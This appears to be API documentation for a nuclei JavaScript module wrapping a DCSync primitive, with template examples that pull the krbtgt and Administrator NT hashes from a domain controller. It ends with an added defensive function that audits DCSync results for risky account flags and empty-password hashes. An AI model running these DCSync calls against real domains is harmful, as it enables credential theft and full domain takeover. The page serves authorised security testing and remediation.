Documentation
Overview
Package secretsdump exposes Mzack9999/goimpacket's DCSync (DRSUAPI IDL_DRSGetNCChanges) primitive to nuclei JavaScript templates.
DCSync requires the Replicating Directory Changes / Replicating Directory Changes All extended rights on the domain head. Templates that reach this point have typically already proved compromise of a Domain Admin account or of a principal with the right ACEs (e.g. via samr / ldap / kerberos chains).
Only single-object DCSync is exposed today; full-domain replication is intentionally left out as it requires explicit operator opt-in.
Types
type Client
```go
type Client struct {
	Host   string
	Domain string
	User   string
	Pass   string
	// contains filtered or unexported fields
}
```
Client wraps an authenticated session to a Domain Controller and exposes DCSync helpers.
@example
```javascript
const sd = require('nuclei/secretsdump');
const c = new sd.Client('dc01.acme.local', 'acme.local', 'admin', 'P@ss');
const krbtgt = c.DCSync('krbtgt');
ExportAs('krbtgt_nthash', krbtgt.nthash);
```
func (*Client) DCSync
DCSync replicates secrets for a single principal (DN, sAMAccountName, or SID) and returns its NT/LM hashes, hash history and account state.
@example
```javascript
const sd = require('nuclei/secretsdump');
const c = new sd.Client('dc01', 'acme.local', 'admin', 'P@ss');
const s = c.DCSync('Administrator');
log(s.nthash);
```
type Secret
```go
type Secret struct {
	SAMAccountName     string   `json:"sam_account_name"`
	DistinguishedName  string   `json:"distinguished_name"`
	RID                uint32   `json:"rid"`
	NTHash             string   `json:"nthash,omitempty"`
	LMHash             string   `json:"lmhash,omitempty"`
	NTHashHistory      []string `json:"nthash_history,omitempty"`
	LMHashHistory      []string `json:"lmhash_history,omitempty"`
	UserAccountControl uint32   `json:"user_account_control"`
	PwdLastSet         int64    `json:"pwd_last_set"`
}
```
Secret is the result of a DCSync against a single principal.
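A defensive follow-up to the `Secret` type, added here as an example and not part of the secretsdump package or nuclei: it triages one DCSync result into remediation findings by decoding `user_account_control` and checking the hashes against the well-known empty-password values. `auditSecret`, the sample object and the hex-string hash format are assumptions; the field names come from the JSON tags above.

```javascript
// Added example, not part of the secretsdump package. Field names follow the
// Secret JSON tags on this page; hex-string hash values are an assumption.
// userAccountControl bits (documented Active Directory values) and their risk.
const UAC = [
  [0x000002, 'ACCOUNTDISABLE', null],
  [0x000020, 'PASSWD_NOTREQD', 'account may have an empty password'],
  [0x000080, 'ENCRYPTED_TEXT_PWD_ALLOWED', 'password stored with reversible encryption'],
  [0x010000, 'DONT_EXPIRE_PASSWORD', 'password never expires'],
  [0x080000, 'TRUSTED_FOR_DELEGATION', 'unconstrained Kerberos delegation'],
  [0x400000, 'DONT_REQ_PREAUTH', 'Kerberos pre-authentication not required'],
];
// Well-known NT and LM hashes of the empty string.
const EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0';
const EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee';
// Well-known RIDs whose exposure calls for a specific remediation step.
const RID_NOTES = {
  500: 'built-in Administrator exposed: reset its password',
  502: 'krbtgt exposed: rotate the krbtgt password twice',
};

function auditSecret(s) {
  const uac = s.user_account_control >>> 0;
  const set = UAC.filter(([bit]) => (uac & bit) !== 0);
  const findings = set
    .filter(([, , why]) => why)
    .map(([, name, why]) => `${name}: ${why}`);
  const nt = (s.nthash || '').toLowerCase();
  const lm = (s.lmhash || '').toLowerCase(); // omitted when empty (omitempty)
  if (nt === EMPTY_NT) findings.push('NT hash is the hash of an empty password');
  if (lm && lm !== EMPTY_LM) findings.push('LM hash is stored for this account');
  if (RID_NOTES[s.rid]) findings.push(RID_NOTES[s.rid]);
  return {
    account: s.sam_account_name,
    enabled: (uac & 0x2) === 0,
    flags: set.map(([, name]) => name),
    findings,
  };
}

// Constructed sample result (not a real account or hash).
const sample = {
  sam_account_name: 'svc-backup',
  distinguished_name: 'CN=svc-backup,CN=Users,DC=acme,DC=local',
  rid: 1108,
  nthash: '31D6CFE0D16AE931B73C59D7E0C089C0',
  lmhash: 'AAD3B435B51404EEAAD3B435B51404EE',
  user_account_control: 0x10220, // NORMAL_ACCOUNT | PASSWD_NOTREQD | DONT_EXPIRE_PASSWORD
};
console.log(JSON.stringify(auditSecret(sample), null, 2));
```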